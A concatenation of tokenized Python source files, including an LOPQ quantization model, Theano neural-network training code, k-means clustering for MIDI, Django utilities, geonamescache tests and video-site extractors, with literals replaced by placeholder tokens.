fine_codes = self . predict_fine ( x , coarse_codes ) <EOL> return LOPQCode ( coarse_codes , fine_codes ) <EOL> def predict_coarse ( self , x ) : <EOL> """<STR_LIT>""" <EOL> return tuple ( [ predict_cluster ( cx , self . Cs [ split ] ) for cx , split in iterate_splits ( x , self . num_coarse_splits ) ] ) <EOL> def predict_fine ( self , x , coarse_codes = None ) : <EOL> """<STR_LIT>""" <EOL> if coarse_codes is None : <EOL> coarse_codes = self . predict_coarse ( x ) <EOL> px = self . project ( x , coarse_codes ) <EOL> fine_codes = [ ] <EOL> for cx , split in iterate_splits ( px , self . num_coarse_splits ) : <EOL> _ , _ , _ , subC = self . get_split_parameters ( split ) <EOL> fine_codes += [ predict_cluster ( fx , subC [ sub_split ] ) for fx , sub_split in iterate_splits ( cx , self . num_fine_splits ) ] <EOL> return tuple ( fine_codes ) <EOL> def project ( self , x , coarse_codes , coarse_split = None ) : <EOL> """<STR_LIT>""" <EOL> px = [ ] <EOL> if coarse_split is None : <EOL> split_iter = iterate_splits ( x , self . num_coarse_splits ) <EOL> else : <EOL> split_iter = [ ( np . split ( x , self . num_coarse_splits ) [ coarse_split ] , coarse_split ) ] <EOL> for cx , split in split_iter : <EOL> C , R , mu , _ = self . get_split_parameters ( split ) <EOL> cluster = coarse_codes [ split ] <EOL> r = cx - C [ cluster ] <EOL> pr = np . dot ( R [ cluster ] , r - mu [ cluster ] ) <EOL> px . append ( pr ) <EOL> return np . concatenate ( px ) <EOL> def reconstruct ( self , codes ) : <EOL> """<STR_LIT>""" <EOL> coarse_codes , fine_codes = codes <EOL> x = [ ] <EOL> for fc , split in iterate_splits ( fine_codes , self . num_coarse_splits ) : <EOL> C , R , mu , subC = self . get_split_parameters ( split ) <EOL> sx = reduce ( lambda acc , c : np . concatenate ( ( acc , subC [ c [ <NUM_LIT:0> ] ] [ c [ <NUM_LIT:1> ] ] ) ) , enumerate ( fc ) , [ ] ) <EOL> cluster = coarse_codes [ split ] <EOL> r = np . dot ( R [ cluster ] . transpose ( ) , sx ) + mu [ cluster ] <EOL> x = np . concatenate ( ( x , r + C [ cluster ] ) ) <EOL> return x <EOL> def get_subquantizer_distances ( self , x , coarse_codes , coarse_split = None ) : <EOL> """<STR_LIT>""" <EOL> px = self . project ( x , coarse_codes ) <EOL> subquantizer_dists = [ ] <EOL> if coarse_split is None : <EOL> split_iter = iterate_splits ( px , self . num_coarse_splits ) <EOL> else : <EOL> split_iter = [ ( np . split ( px , self . num_coarse_splits ) [ coarse_split ] , coarse_split ) ] <EOL> for cx , split in split_iter : <EOL> _ , _ , _ , subC = self . get_split_parameters ( split ) <EOL> subquantizer_dists += [ ( ( fx - subC [ sub_split ] ) ** <NUM_LIT:2> ) . sum ( axis = <NUM_LIT:1> ) for fx , sub_split in iterate_splits ( cx , self . num_fine_splits ) ] <EOL> return subquantizer_dists <EOL> def get_cell_id_for_coarse_codes ( self , coarse_codes ) : <EOL> return coarse_codes [ <NUM_LIT:1> ] + coarse_codes [ <NUM_LIT:0> ] * self . V <EOL> def get_coarse_codes_for_cell_id ( self , cell_id ) : <EOL> return ( int ( np . floor ( float ( cell_id ) / self . V ) ) , cell_id % self . V ) <EOL> def export_mat ( self , filename ) : <EOL> """<STR_LIT>""" <EOL> from scipy . io import savemat <EOL> from . utils import concat_new_first <EOL> Cs = concat_new_first ( self . Cs ) <EOL> Rs = concat_new_first ( self . Rs ) <EOL> mus = concat_new_first ( self . mus ) <EOL> subs = concat_new_first ( map ( concat_new_first , self . subquantizers ) ) <EOL> savemat ( filename , { '<STR_LIT>' : Cs , '<STR_LIT>' : Rs , '<STR_LIT>' : mus , '<STR_LIT>' : subs , '<STR_LIT>' : self . V , '<STR_LIT:M>' : self . M } ) <EOL> @ staticmethod <EOL> def load_mat ( filename ) : <EOL> """<STR_LIT>""" <EOL> from scipy . io import loadmat <EOL> d = loadmat ( filename ) <EOL> M = d [ '<STR_LIT:M>' ] [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> Cs = tuple ( map ( np . squeeze , np . split ( d [ '<STR_LIT>' ] , <NUM_LIT:2> , axis = <NUM_LIT:0> ) ) ) <EOL> Rs = tuple ( map ( np . squeeze , np . split ( d [ '<STR_LIT>' ] , <NUM_LIT:2> , axis = <NUM_LIT:0> ) ) ) <EOL> mus = tuple ( map ( np . squeeze , np . split ( d [ '<STR_LIT>' ] , <NUM_LIT:2> , axis = <NUM_LIT:0> ) ) ) <EOL> subs = tuple ( [ map ( np . squeeze , np . split ( half , M / <NUM_LIT:2> , axis = <NUM_LIT:0> ) ) for half in map ( np . squeeze , np . split ( d [ '<STR_LIT>' ] , <NUM_LIT:2> , axis = <NUM_LIT:0> ) ) ] ) <EOL> return LOPQModel ( parameters = ( Cs , Rs , mus , subs ) ) <EOL> def export_proto ( self , f ) : <EOL> """<STR_LIT>""" <EOL> from . lopq_model_pb2 import LOPQModelParams <EOL> from itertools import chain <EOL> lopq_params = LOPQModelParams ( ) <EOL> lopq_params . D = <NUM_LIT:2> * self . Cs [ <NUM_LIT:0> ] . shape [ <NUM_LIT:1> ] <EOL> lopq_params . V = self . V <EOL> lopq_params . M = self . M <EOL> lopq_params . num_subquantizers = self . subquantizer_clusters <EOL> def matrix_from_ndarray ( m , a ) : <EOL> m . values . extend ( map ( float , np . nditer ( a , order = '<STR_LIT:C>' ) ) ) <EOL> m . shape . extend ( a . shape ) <EOL> return m <EOL> def vector_from_ndarray ( m , a ) : <EOL> m . values . extend ( map ( float , np . nditer ( a , order = '<STR_LIT:C>' ) ) ) <EOL> return m <EOL> for C in self . Cs : <EOL> matrix_from_ndarray ( lopq_params . Cs . add ( ) , C ) <EOL> for R in chain ( * self . Rs ) : <EOL> matrix_from_ndarray ( lopq_params . Rs . add ( ) , R ) <EOL> for mu in chain ( * self . mus ) : <EOL> vector_from_ndarray ( lopq_params . mus . add ( ) , mu ) <EOL> for sub in chain ( * self . subquantizers ) : <EOL> matrix_from_ndarray ( lopq_params . subs . add ( ) , sub ) <EOL> if type ( f ) is str : <EOL> f = open ( f , '<STR_LIT:wb>' ) <EOL> f . write ( lopq_params . SerializeToString ( ) ) <EOL> f . close ( ) <EOL> @ staticmethod <EOL> def load_proto ( filename ) : <EOL> """<STR_LIT>""" <EOL> from . lopq_model_pb2 import LOPQModelParams <EOL> from . utils import concat_new_first <EOL> def halves ( arr ) : <EOL> return [ arr [ : len ( arr ) / <NUM_LIT:2> ] , arr [ len ( arr ) / <NUM_LIT:2> : ] ] <EOL> lopq_params = LOPQModelParams ( ) <EOL> try : <EOL> f = open ( filename ) <EOL> lopq_params . ParseFromString ( f . read ( ) ) <EOL> f . close ( ) <EOL> Cs = [ np . reshape ( C . values , C . shape ) for C in lopq_params . Cs ] <EOL> Rs = map ( concat_new_first , halves ( [ np . reshape ( R . values , R . shape ) for R in lopq_params . Rs ] ) ) <EOL> mus = map ( concat_new_first , halves ( [ np . array ( mu . values ) for mu in lopq_params . mus ] ) ) <EOL> subs = halves ( [ np . reshape ( sub . values , sub . shape ) for sub in lopq_params . subs ] ) <EOL> return LOPQModel ( parameters = ( Cs , Rs , mus , subs ) ) <EOL> except IOError : <EOL> print filename + "<STR_LIT>" <EOL> return None </s>
<s> import cPickle <EOL> import gzip <EOL> import os <EOL> import sys <EOL> import time <EOL> import numpy <EOL> import theano <EOL> import theano . tensor as T <EOL> from theano . tensor . shared_randomstreams import RandomStreams <EOL> from io_func . model_io import _nnet2file , _cfg2file , _file2nnet , _cnn2file , _file2cnn , log <EOL> from utils . utils import parse_arguments <EOL> from utils . learn_rates import _lrate2file , _file2lrate <EOL> from utils . network_config import NetworkConfig <EOL> from learning . sgd import train_sgd , validate_by_minibatch <EOL> from models . cnn import CNN <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> arg_elements = [ sys . argv [ i ] for i in range ( <NUM_LIT:1> , len ( sys . argv ) ) ] <EOL> arguments = parse_arguments ( arg_elements ) <EOL> required_arguments = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> for arg in required_arguments : <EOL> if arguments . has_key ( arg ) == False : <EOL> print "<STR_LIT>" % ( arg ) ; exit ( <NUM_LIT:1> ) <EOL> train_data_spec = arguments [ '<STR_LIT>' ] <EOL> valid_data_spec = arguments [ '<STR_LIT>' ] <EOL> conv_nnet_spec = arguments [ '<STR_LIT>' ] <EOL> nnet_spec = arguments [ '<STR_LIT>' ] <EOL> wdir = arguments [ '<STR_LIT>' ] <EOL> cfg = NetworkConfig ( ) ; cfg . model_type = '<STR_LIT>' <EOL> cfg . parse_config_cnn ( arguments , '<STR_LIT>' + nnet_spec , conv_nnet_spec ) <EOL> cfg . init_data_reading ( train_data_spec , valid_data_spec ) <EOL> ptr_layer_number = <NUM_LIT:0> ; ptr_file = '<STR_LIT>' <EOL> if arguments . has_key ( '<STR_LIT>' ) and arguments . has_key ( '<STR_LIT>' ) : <EOL> ptr_file = arguments [ '<STR_LIT>' ] <EOL> ptr_layer_number = int ( arguments [ '<STR_LIT>' ] ) <EOL> resume_training = False <EOL> if os . path . exists ( wdir + '<STR_LIT>' ) and os . path . exists ( wdir + '<STR_LIT>' ) : <EOL> resume_training = True <EOL> cfg . lrate = _file2lrate ( wdir + '<STR_LIT>' ) <EOL> log ( '<STR_LIT>' + str ( cfg . lrate . epoch ) ) <EOL> numpy_rng = numpy . random . RandomState ( <NUM_LIT> ) <EOL> theano_rng = RandomStreams ( numpy_rng . randint ( <NUM_LIT:2> ** <NUM_LIT:30> ) ) <EOL> log ( '<STR_LIT>' ) <EOL> cnn = CNN ( numpy_rng = numpy_rng , theano_rng = theano_rng , cfg = cfg ) <EOL> if ( ptr_layer_number > <NUM_LIT:0> ) and ( resume_training is False ) : <EOL> _file2nnet ( cnn . layers , set_layer_num = ptr_layer_number , filename = ptr_file ) <EOL> if resume_training : <EOL> _file2nnet ( cnn . layers , filename = wdir + '<STR_LIT>' ) <EOL> log ( '<STR_LIT>' ) <EOL> train_fn , valid_fn = cnn . build_finetune_functions ( <EOL> ( cfg . train_x , cfg . train_y ) , ( cfg . valid_x , cfg . valid_y ) , <EOL> batch_size = cfg . batch_size ) <EOL> log ( '<STR_LIT>' ) <EOL> while ( cfg . lrate . get_rate ( ) != <NUM_LIT:0> ) : <EOL> train_error = train_sgd ( train_fn , cfg ) <EOL> log ( '<STR_LIT>' % ( cfg . lrate . epoch , <NUM_LIT:100> * numpy . mean ( train_error ) ) + '<STR_LIT>' ) <EOL> valid_error = validate_by_minibatch ( valid_fn , cfg ) <EOL> log ( '<STR_LIT>' % ( cfg . lrate . epoch , cfg . lrate . get_rate ( ) , <NUM_LIT:100> * numpy . mean ( valid_error ) ) + '<STR_LIT>' ) <EOL> cfg . lrate . get_next_rate ( current_error = <NUM_LIT:100> * numpy . mean ( valid_error ) ) <EOL> if cfg . lrate . epoch % cfg . model_save_step == <NUM_LIT:0> : <EOL> _nnet2file ( cnn . layers , filename = wdir + '<STR_LIT>' ) <EOL> _lrate2file ( cfg . lrate , wdir + '<STR_LIT>' ) <EOL> if cfg . param_output_file != '<STR_LIT>' : <EOL> _nnet2file ( cnn . layers , filename = cfg . param_output_file , input_factor = cfg . input_dropout_factor , factor = cfg . dropout_factor ) <EOL> log ( '<STR_LIT>' + cfg . param_output_file ) <EOL> if cfg . cfg_output_file != '<STR_LIT>' : <EOL> _cfg2file ( cnn . cfg , filename = cfg . cfg_output_file ) <EOL> log ( '<STR_LIT>' + cfg . cfg_output_file ) <EOL> if cfg . kaldi_output_file != '<STR_LIT>' : <EOL> cnn . fc_dnn . write_model_to_kaldi ( cfg . kaldi_output_file ) <EOL> log ( '<STR_LIT>' + cfg . kaldi_output_file ) <EOL> os . remove ( wdir + '<STR_LIT>' ) <EOL> os . remove ( wdir + '<STR_LIT>' ) </s>
<s> import cPickle <EOL> import gzip <EOL> import os <EOL> import sys <EOL> import time <EOL> import numpy <EOL> import theano <EOL> import theano . tensor as T <EOL> from theano . tensor . shared_randomstreams import RandomStreams <EOL> class HiddenLayer ( object ) : <EOL> def __init__ ( self , rng , input , n_in , n_out , W = None , b = None , <EOL> activation = T . tanh , do_maxout = False , pool_size = <NUM_LIT:1> ) : <EOL> """<STR_LIT>""" <EOL> self . input = input <EOL> self . n_in = n_in <EOL> self . n_out = n_out <EOL> self . activation = activation <EOL> self . type = '<STR_LIT>' <EOL> if W is None : <EOL> W_values = numpy . asarray ( rng . uniform ( <EOL> low = - numpy . sqrt ( <NUM_LIT> / ( n_in + n_out ) ) , <EOL> high = numpy . sqrt ( <NUM_LIT> / ( n_in + n_out ) ) , <EOL> size = ( n_in , n_out ) ) , dtype = theano . config . floatX ) <EOL> if self . activation == theano . tensor . nnet . sigmoid : <EOL> W_values *= <NUM_LIT:4> <EOL> W = theano . shared ( value = W_values , name = '<STR_LIT>' , borrow = True ) <EOL> if b is None : <EOL> b_values = numpy . zeros ( ( n_out , ) , dtype = theano . config . floatX ) <EOL> b = theano . shared ( value = b_values , name = '<STR_LIT:b>' , borrow = True ) <EOL> self . W = W <EOL> self . b = b <EOL> self . delta_W = theano . shared ( value = numpy . zeros ( ( n_in , n_out ) , <EOL> dtype = theano . config . floatX ) , name = '<STR_LIT>' ) <EOL> self . delta_b = theano . shared ( value = numpy . zeros_like ( self . b . get_value ( borrow = True ) , <EOL> dtype = theano . config . floatX ) , name = '<STR_LIT>' ) <EOL> lin_output = T . dot ( input , self . W ) + self . b <EOL> if do_maxout == True : <EOL> self . last_start = n_out - pool_size <EOL> self . tmp_output = lin_output [ : , <NUM_LIT:0> : self . last_start + <NUM_LIT:1> : pool_size ] <EOL> for i in range ( <NUM_LIT:1> , pool_size ) : <EOL> cur = lin_output [ : , i : self . last_start + i + <NUM_LIT:1> : pool_size ] <EOL> self . tmp_output = T . maximum ( cur , self . tmp_output ) <EOL> self . output = self . activation ( self . tmp_output ) <EOL> else : <EOL> self . output = ( lin_output if self . activation is None <EOL> else self . activation ( lin_output ) ) <EOL> self . params = [ self . W , self . b ] <EOL> self . delta_params = [ self . delta_W , self . delta_b ] <EOL> def _dropout_from_layer ( theano_rng , hid_out , p ) : <EOL> """<STR_LIT>""" <EOL> return theano_rng . binomial ( n = <NUM_LIT:1> , p = <NUM_LIT:1> - p , size = hid_out . shape , <EOL> dtype = theano . config . floatX ) * hid_out <EOL> class DropoutHiddenLayer ( HiddenLayer ) : <EOL> def __init__ ( self , rng , input , n_in , n_out , <EOL> W = None , b = None , activation = T . tanh , do_maxout = False , pool_size = <NUM_LIT:1> , dropout_factor = <NUM_LIT:0.5> ) : <EOL> super ( DropoutHiddenLayer , self ) . __init__ ( <EOL> rng = rng , input = input , n_in = n_in , n_out = n_out , W = W , b = b , <EOL> activation = activation , do_maxout = do_maxout , pool_size = pool_size ) <EOL> self . theano_rng = RandomStreams ( rng . randint ( <NUM_LIT:2> ** <NUM_LIT:30> ) ) <EOL> self . dropout_output = _dropout_from_layer ( theano_rng = self . theano_rng , <EOL> hid_out = self . output , p = dropout_factor ) </s>
<s> def alphabet_to_number ( word ) : <EOL> alphabet = '<STR_LIT>' <EOL> number = '<STR_LIT>' <EOL> array_alphabet = list ( alphabet ) <EOL> array_number = number . split ( '<STR_LIT:U+0020>' ) <EOL> converted_word = [ ] <EOL> for letter in word : <EOL> for n in range ( <NUM_LIT:0> , len ( array_number ) , <NUM_LIT:1> ) : <EOL> if letter == array_alphabet [ n ] : <EOL> converted_word . append ( array_number [ n ] ) <EOL> converted_word . append ( '<STR_LIT:U+0020>' ) <EOL> del converted_word [ - <NUM_LIT:1> ] <EOL> return '<STR_LIT>' . join ( converted_word ) <EOL> def number_to_alphabet ( numbers ) : <EOL> alphabet = '<STR_LIT>' <EOL> number = '<STR_LIT>' <EOL> array_number = number . split ( '<STR_LIT:U+0020>' ) <EOL> array_alphabet = list ( alphabet ) <EOL> numbers = numbers . split ( '<STR_LIT:U+0020>' ) <EOL> converted_numbers = [ ] <EOL> for num in numbers : <EOL> for n in range ( <NUM_LIT:0> , len ( array_alphabet ) , <NUM_LIT:1> ) : <EOL> if int ( num ) > <NUM_LIT> : <EOL> num = str ( int ( num ) - <NUM_LIT> ) <EOL> else : <EOL> if num == array_number [ n ] : <EOL> converted_numbers . append ( array_alphabet [ n ] ) <EOL> converted_numbers . append ( '<STR_LIT:U+0020>' ) <EOL> del converted_numbers [ - <NUM_LIT:1> ] <EOL> return '<STR_LIT>' . join ( converted_numbers ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> plaintext = '<STR_LIT>' <EOL> print ( alphabet_to_number ( plaintext ) ) <EOL> plaintext_number = '<STR_LIT>' <EOL> print ( number_to_alphabet ( plaintext_number ) ) </s>
<s> from lib3 import * <EOL> def trial_division ( N ) : <EOL> root = int ( ceil ( sqrt ( N ) ) ) <EOL> stop , p = False , root <EOL> while stop == False : <EOL> if N % p == <NUM_LIT:0> or p < <NUM_LIT:2> : <EOL> return p , int ( N / p ) <EOL> stop = True <EOL> p -= <NUM_LIT:1> <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> N = <NUM_LIT> <EOL> trial_division ( N ) <EOL> print ( '<STR_LIT>' , trial_division ( N ) ) <EOL> '''<STR_LIT>''' </s>
<s> from functools import wraps <EOL> import os <EOL> from contextlib import contextmanager <EOL> import platform <EOL> from django . core . exceptions import ImproperlyConfigured <EOL> from django . utils . importlib import import_module <EOL> class DefaultedAttributes ( object ) : <EOL> def __init__ ( self , underlying , defaults ) : <EOL> self . underlying = underlying <EOL> self . defaults = defaults <EOL> def __getattr__ ( self , name ) : <EOL> if hasattr ( self . underlying , name ) : <EOL> return getattr ( self . underlying , name ) <EOL> try : <EOL> return self . defaults [ name ] <EOL> except KeyError , error : <EOL> raise AttributeError ( "<STR_LIT>" % ( self . underlying . __class__ . __name__ , name ) ) <EOL> def get_callable ( callable ) : <EOL> if isinstance ( callable , basestring ) : <EOL> module , attr = callable . rsplit ( '<STR_LIT:.>' , <NUM_LIT:1> ) <EOL> try : <EOL> mod = import_module ( module ) <EOL> except ImportError , e : <EOL> raise ImproperlyConfigured ( '<STR_LIT>' % ( callable , e ) ) <EOL> try : <EOL> callable = getattr ( mod , attr ) <EOL> except AttributeError , e : <EOL> raise ImproperlyConfigured ( '<STR_LIT>' % ( callable , e ) ) <EOL> return callable <EOL> def only_on ( system ) : <EOL> def decor ( func ) : <EOL> @ wraps ( func ) <EOL> def callable ( * args , ** kwargs ) : <EOL> if platform . system ( ) != system : <EOL> return <EOL> return func ( * args , ** kwargs ) <EOL> return callable <EOL> return decor <EOL> @ contextmanager <EOL> def altered_umask ( umask ) : <EOL> old_umask = os . umask ( umask ) <EOL> try : <EOL> yield <EOL> finally : <EOL> os . umask ( old_umask ) </s>
<s> import unittest <EOL> from geonamescache import GeonamesCache <EOL> class GeonamesCacheTestSuite ( unittest . TestCase ) : <EOL> """<STR_LIT>""" <EOL> def setUp ( self ) : <EOL> self . geonamescache = GeonamesCache ( ) <EOL> def test_continents ( self ) : <EOL> continents = self . geonamescache . get_continents ( ) <EOL> testdata = ( <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> ) <EOL> for code , name in testdata : <EOL> self . assertTrue ( code in continents ) <EOL> self . assertEqual ( name , continents [ code ] [ '<STR_LIT:name>' ] ) <EOL> for code in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> self . assertTrue ( code not in continents ) <EOL> def test_get_countries ( self ) : <EOL> countries = self . geonamescache . get_countries ( ) <EOL> testdata = ( ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> for code , name in testdata : <EOL> self . assertTrue ( code in countries ) <EOL> self . assertEqual ( name , countries [ code ] [ '<STR_LIT:name>' ] ) <EOL> for code in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> self . assertTrue ( code not in countries ) <EOL> def test_us_states ( self ) : <EOL> us_states = self . geonamescache . get_us_states ( ) <EOL> testdata = ( <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> for code , name in testdata : <EOL> self . assertTrue ( code in us_states ) <EOL> self . assertEqual ( name , us_states [ code ] [ '<STR_LIT:name>' ] ) <EOL> for code in [ '<STR_LIT>' , '<STR_LIT>' ] : <EOL> self . assertTrue ( code not in us_states ) <EOL> def test_get_countries_by_names ( self ) : <EOL> self . assertTrue ( len ( self . geonamescache . get_countries_by_names ( ) ) , <EOL> len ( self . geonamescache . get_countries ( ) ) ) <EOL> def test_get_cities_by_name ( self ) : <EOL> cities = self . geonamescache . get_cities ( ) <EOL> for gid , name in ( ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) ) : <EOL> self . assertEqual ( name , cities [ gid ] [ '<STR_LIT:name>' ] ) <EOL> def test_get_cities_by_name_madrid ( self ) : <EOL> self . assertEqual ( <EOL> <NUM_LIT:2> , len ( self . geonamescache . get_cities_by_name ( '<STR_LIT>' ) ) ) <EOL> def test_us_counties_len ( self ) : <EOL> us_counties = self . geonamescache . get_us_counties ( ) <EOL> self . assertEqual ( <NUM_LIT> , len ( us_counties ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> import util <EOL> import numpy as np <EOL> import random <EOL> import sys <EOL> def getBestBarList ( midiFileName , beatsPerBar = <NUM_LIT:4> ) : <EOL> barLists = util . getNGramBarList ( midiFileName , n = beatsPerBar ) <EOL> return barLists [ <NUM_LIT:0> ] <EOL> def euclideanDistance ( mat_a , index_mat , index ) : <EOL> diff_mat = np . subtract ( mat_a , np . tile ( index_mat [ index ] , ( mat_a . shape [ <NUM_LIT:0> ] , <NUM_LIT:1> ) ) ) <EOL> dists = [ np . linalg . norm ( vec ) for vec in diff_mat ] <EOL> return dists <EOL> def cosineDistance ( mat_a , index_mat , index ) : <EOL> dot_mat = np . dot ( mat_a , index_mat [ index ] . reshape ( - <NUM_LIT:1> , <NUM_LIT:1> ) ) . transpose ( ) <EOL> dists = [ dot_mat [ <NUM_LIT:0> , i ] / ( np . linalg . norm ( mat_a [ i ] ) * np . linalg . norm ( index_mat [ index ] ) ) for i in range ( dot_mat . shape [ <NUM_LIT:1> ] ) ] <EOL> return dists <EOL> def getClosestCentroid ( centroids_mat , data_mat , index ) : <EOL> dists = euclideanDistance ( centroids_mat , data_mat , index ) <EOL> return np . argmin ( dists ) <EOL> def getClosestCentroidFromVector ( centroids_mat , vector ) : <EOL> return getClosestCentroid ( centroids_mat , [ vector ] , <NUM_LIT:0> ) <EOL> def getFeatureCentroids ( midiFiles , beatsPerBar = <NUM_LIT:4> , numCentroids = <NUM_LIT:12> , maxIterations = <NUM_LIT:100> ) : <EOL> bestBarList = [ ] <EOL> for midiFileName in midiFiles : <EOL> bestBarList += getBestBarList ( midiFileName , beatsPerBar = beatsPerBar ) <EOL> numExamples = len ( bestBarList ) <EOL> data_mat = np . array ( [ bar . getKMeansFeatures ( ) for bar in bestBarList ] ) <EOL> print '<STR_LIT>' <EOL> indices = range ( numExamples ) <EOL> random . shuffle ( indices ) <EOL> centroids_mat = data_mat [ indices [ : numCentroids ] ] <EOL> iterations = <NUM_LIT:0> <EOL> corr_centers = [ - <NUM_LIT:1> ] * numExamples <EOL> n_dashes = <NUM_LIT:0> <EOL> print "<STR_LIT>" , <EOL> for _ in range ( maxIterations ) : <EOL> if _ * <NUM_LIT> / maxIterations > n_dashes : <EOL> for i in range ( ( ( _ * <NUM_LIT> ) / maxIterations ) - n_dashes ) : <EOL> sys . stdout . write ( '<STR_LIT:->' ) <EOL> sys . stdout . flush ( ) <EOL> n_dashes += <NUM_LIT:1> <EOL> iterations += <NUM_LIT:1> <EOL> corr_points = [ [ ] for placeholder in range ( numCentroids ) ] <EOL> new_corr_centers = [ ] <EOL> for index in range ( numExamples ) : <EOL> center = getClosestCentroid ( centroids_mat , data_mat , index ) <EOL> new_corr_centers . append ( center ) <EOL> corr_points [ center ] . append ( index ) <EOL> for index in range ( numCentroids ) : <EOL> rel_points = data_mat [ corr_points [ index ] ] . transpose ( ) <EOL> centroids_mat [ index ] = np . array ( [ np . mean ( pt_points ) if pt_points . any ( ) else <NUM_LIT:0> for pt_points in rel_points ] ) <EOL> if new_corr_centers == corr_centers : <EOL> break <EOL> corr_centers = list ( new_corr_centers ) <EOL> print "<STR_LIT>" <EOL> return ( centroids_mat , corr_centers ) <EOL> def evaluateKmeansClusters ( midiFiles , centroids , corr_centers ) : <EOL> bestBarList = [ ] <EOL> for midiFileName in midiFiles : <EOL> bestBarList += getBestBarList ( midiFileName ) <EOL> numExamples = len ( bestBarList ) <EOL> numCentroids = centroids . shape [ <NUM_LIT:0> ] <EOL> data_mat = np . array ( [ bar . getKMeansFeatures ( ) for bar in bestBarList ] ) <EOL> def silhouette ( index ) : <EOL> same_cntr_pts = data_mat [ [ i for i , x in enumerate ( corr_centers ) if x == corr_centers [ index ] ] ] <EOL> a_i = np . mean ( euclideanDistance ( same_cntr_pts , data_mat , index ) ) <EOL> diff_centroids = centroids [ [ i for i in range ( numCentroids ) if i != corr_centers [ index ] ] ] <EOL> b_i = np . min ( euclideanDistance ( diff_centroids , data_mat , index ) ) <EOL> return ( b_i - a_i ) / max ( a_i , b_i ) <EOL> return np . mean ( [ silhouette ( i ) for i in range ( numExamples ) ] ) </s>
<s> def __load ( ) : <EOL> import imp , os , sys <EOL> try : <EOL> dirname = os . path . dirname ( __loader__ . archive ) <EOL> except NameError : <EOL> dirname = sys . prefix <EOL> path = os . path . join ( dirname , '<STR_LIT>' ) <EOL> mod = imp . load_dynamic ( __name__ , path ) <EOL> __load ( ) <EOL> del __load </s>
<s> from __future__ import unicode_literals <EOL> import re <EOL> import json <EOL> from . common import InfoExtractor <EOL> from . . utils import ( <EOL> int_or_none , <EOL> parse_age_limit , <EOL> ) <EOL> class BreakIE ( InfoExtractor ) : <EOL> _VALID_URL = r'<STR_LIT>' <EOL> _TESTS = [ { <EOL> '<STR_LIT:url>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:id>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:title>' : '<STR_LIT>' , <EOL> } <EOL> } , { <EOL> '<STR_LIT:url>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , <EOL> } ] <EOL> def _real_extract ( self , url ) : <EOL> video_id = self . _match_id ( url ) <EOL> webpage = self . _download_webpage ( <EOL> '<STR_LIT>' % video_id , video_id ) <EOL> info = json . loads ( self . _search_regex ( <EOL> r'<STR_LIT>' , <EOL> webpage , '<STR_LIT>' , flags = re . DOTALL ) ) <EOL> youtube_id = info . get ( '<STR_LIT>' ) <EOL> if youtube_id : <EOL> return self . url_result ( youtube_id , '<STR_LIT>' ) <EOL> formats = [ { <EOL> '<STR_LIT:url>' : media [ '<STR_LIT>' ] + '<STR_LIT:?>' + info [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : media [ '<STR_LIT>' ] , <EOL> '<STR_LIT:width>' : media [ '<STR_LIT:width>' ] , <EOL> '<STR_LIT>' : media [ '<STR_LIT>' ] , <EOL> } for media in info [ '<STR_LIT>' ] ] <EOL> if not formats : <EOL> formats . append ( { <EOL> '<STR_LIT:url>' : info [ '<STR_LIT>' ] <EOL> } ) <EOL> self . _sort_formats ( formats ) <EOL> duration = int_or_none ( info . get ( '<STR_LIT>' ) ) <EOL> age_limit = parse_age_limit ( info . get ( '<STR_LIT>' ) ) <EOL> return { <EOL> '<STR_LIT:id>' : video_id , <EOL> '<STR_LIT:title>' : info [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : info [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : duration , <EOL> '<STR_LIT>' : age_limit , <EOL> '<STR_LIT>' : formats , <EOL> } </s>
<s> from __future__ import unicode_literals <EOL> from . common import InfoExtractor <EOL> from . . utils import ExtractorError <EOL> class FreeVideoIE ( InfoExtractor ) : <EOL> _VALID_URL = r'<STR_LIT>' <EOL> _TEST = { <EOL> '<STR_LIT:url>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:id>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> "<STR_LIT:title>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> } , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } <EOL> def _real_extract ( self , url ) : <EOL> video_id = self . _match_id ( url ) <EOL> webpage , handle = self . _download_webpage_handle ( url , video_id ) <EOL> if '<STR_LIT>' in handle . geturl ( ) : <EOL> raise ExtractorError ( <EOL> '<STR_LIT>' , <EOL> expected = True ) <EOL> video_url = self . _search_regex ( <EOL> r'<STR_LIT>' , <EOL> webpage , '<STR_LIT>' ) <EOL> return { <EOL> '<STR_LIT:id>' : video_id , <EOL> '<STR_LIT:url>' : video_url , <EOL> '<STR_LIT:title>' : video_id , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> } </s>
